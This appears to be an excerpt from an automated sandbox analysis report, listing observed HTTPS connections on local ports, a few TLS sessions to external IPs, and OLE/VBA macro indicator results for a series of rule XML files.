            Source: chromecache_1172.12.drString found in binary or memory: https://login.windows-ppe.net
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.17:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.2:443 -> 192.168.2.17:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.2:443 -> 192.168.2.17:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49846 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.209.133:443 -> 192.168.2.17:49847 version: TLS 1.2
            Source: rule700351v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule70036v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule70037v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700400v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule700401v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule700450v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700451v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700500v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700501v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700550v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700551v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700600v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700601v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700650v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700651v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700700v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700701v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700750v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700751v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700850v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700851v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700900v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700901v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700950v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule700951v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701050v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701051v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701100v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701101v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701150v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701151v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701200v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701201v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701250v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701251v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701300v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701301v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701350v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701351v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324004v4.xml.3.drOLE indicator, VBA macros: true
            Source: rule701400v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324005v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule701401v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324005v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule701500v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324006v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule701501v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324006v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule701550v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324007v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule701551v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324007v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule701650v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324008v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule701651v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324008v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule324009v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule701700v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701701v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324009v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule701750v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324010v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule701751v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324010v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule701800v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324011v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701801v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324012v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule701850v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324013v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule701851v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324014v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule701900v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324015v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule701901v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule324016v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule325000v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule701950v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule701951v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule325001v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule702000v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule325002v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule702001v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule360000v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702050v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule360001v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702051v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule370000v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule702100v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule370001v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule702101v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule370002v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule702150v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule370005v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule702151v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule370006v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule370007v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702200v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule702201v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule370009v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule702250v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule370011v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule702251v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule370012v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule702300v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule390004v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702301v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule390005v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule702350v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule440000v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702351v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule460008v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule702400v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule460009v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule702401v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule490002v13.xml.3.drOLE indicator, VBA macros: true
            Source: rule490003v7.xml.3.drOLE indicator, VBA macros: true
            Source: rule702450v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule702451v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule490004v7.xml.3.drOLE indicator, VBA macros: true
            Source: rule702500v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule490005v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702501v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule150246v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule490009v5.xml.3.drOLE indicator, VBA macros: true
            Source: rule702550v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule150249v0.xml.3.drOLE indicator, VBA macros: true
            Source: rule490010v7.xml.3.drOLE indicator, VBA macros: true
            Source: rule702551v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule150259v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule490011v4.xml.3.drOLE indicator, VBA macros: true
            Source: rule702600v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule150262v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule490014v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule702601v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule170000v6.xml.3.drOLE indicator, VBA macros: true
            Source: rule490015v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule702650v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule170002v6.xml.3.drOLE indicator, VBA macros: true
            Source: rule490015v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702651v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule170003v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule490015v4.xml.3.drOLE indicator, VBA macros: true
            Source: rule170005v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule490015v5.xml.3.drOLE indicator, VBA macros: true
            Source: rule170007v5.xml.3.drOLE indicator, VBA macros: true
            Source: rule170009v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule702700v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule702701v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule490016v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702750v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule490018v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule702751v1.xml.3.drOLE indicator, VBA macros: true
            Source: rule170011v2.xml.3.drOLE indicator, VBA macros: true
            Source: rule490020v3.xml.3.drOLE indicator, VBA macros: true
            Source: rule700351v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule70036v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule70037v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700400v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700401v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700450v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700451v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700500v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700501v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700550v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700551v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700600v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700601v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700650v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700651v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700700v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700701v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700750v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700751v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700850v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700851v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700900v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700901v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700950v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule700951v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701050v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701051v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701100v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701101v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701150v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701151v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701200v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701201v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701250v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701251v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701300v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701301v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701350v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701351v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324004v4.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701400v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324005v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701401v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324005v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701500v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324006v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701501v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324006v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701550v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324007v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701551v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324007v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701650v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324008v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701651v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324008v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324009v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701700v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701701v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324009v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701750v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324010v2.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701751v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324010v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701800v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324011v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701801v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324012v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701850v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324013v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701851v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324014v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701900v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324015v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701901v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule324016v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule325000v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701950v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule701951v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule325001v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702000v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule325002v0.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule702001v1.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: rule360000v3.xml.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
